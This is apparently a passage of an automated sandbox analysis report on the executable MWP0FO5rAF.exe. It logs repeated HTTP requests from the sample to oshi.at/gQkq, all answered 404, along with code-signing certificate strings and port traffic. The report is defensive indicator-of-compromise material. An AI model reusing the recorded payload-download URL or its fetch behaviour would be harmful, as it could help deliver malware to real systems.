      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficHTTP traffic detected: GET /gQkq HTTP/1.1Host: oshi.at
      Source: global trafficDNS traffic detected: DNS query: oshi.at
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:56:42 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:56:45 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:56:47 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:56:49 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:56:51 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:56:53 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:04 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:07 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:08 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:14 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:16 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:18 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:20 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:22 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:26 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:28 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:29 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:31 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:33 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:35 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:37 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:39 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:40 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:42 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:47 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:49 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:51 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:53 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:56 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:57:58 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:03 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:05 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:08 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:11 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:13 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:15 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:17 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:19 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:21 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:23 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:26 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:28 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:30 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:35 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:37 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:40 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:42 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:44 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:46 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:48 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:51 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:52 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:54 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:56 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:58:59 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:00 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:04 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:06 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:08 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:10 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:14 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:16 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:18 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:20 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:22 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:23 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:25 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:28 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:30 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:32 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:34 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:36 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:37 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:39 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:41 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:43 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:59:45 GMTContent-Type: text/html;charset=UTF-8Content-Length: 1849Connection: close
      Source: MWP0FO5rAF.exeString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
      Source: MWP0FO5rAF.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
      Source: MWP0FO5rAF.exeString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
      Source: MWP0FO5rAF.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
      Source: MWP0FO5rAF.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
      Source: MWP0FO5rAF.exeString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
      Source: MWP0FO5rAF.exeString found in binary or memory: http://ocsps.ssl.com0
      Source: MWP0FO5rAF.exeString found in binary or memory: http://ocsps.ssl.com0?
      Source: MWP0FO5rAF.exeString found in binary or memory: http://ocsps.ssl.com0_
      Source: MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.at
      Source: MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://oshi.atd
      Source: MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000028C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: MWP0FO5rAF.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
      Source: MWP0FO5rAF.exeString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
      Source: MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000029E3000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000028F7000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002952000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002956000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000029E7000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.000000000295A000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002BDD000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002B69000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002946000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002B65000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.000000000293E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/somenonymous/OshiUpload
      Source: MWP0FO5rAF.exe, 00000000.00000002.3222304799.000000000295A000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
      Source: MWP0FO5rAF.exeString found in binary or memory: https://oshi.at/gQkq
      Source: MWP0FO5rAF.exe, 00000000.00000002.3222304799.000000000295A000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.00000000028FB000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, MWP0FO5rAF.exe, 00000000.00000002.3222304799.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/gQkqd
      Source: MWP0FO5rAF.exeString found in binary or memory: https://www.ssl.com/repository0
      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
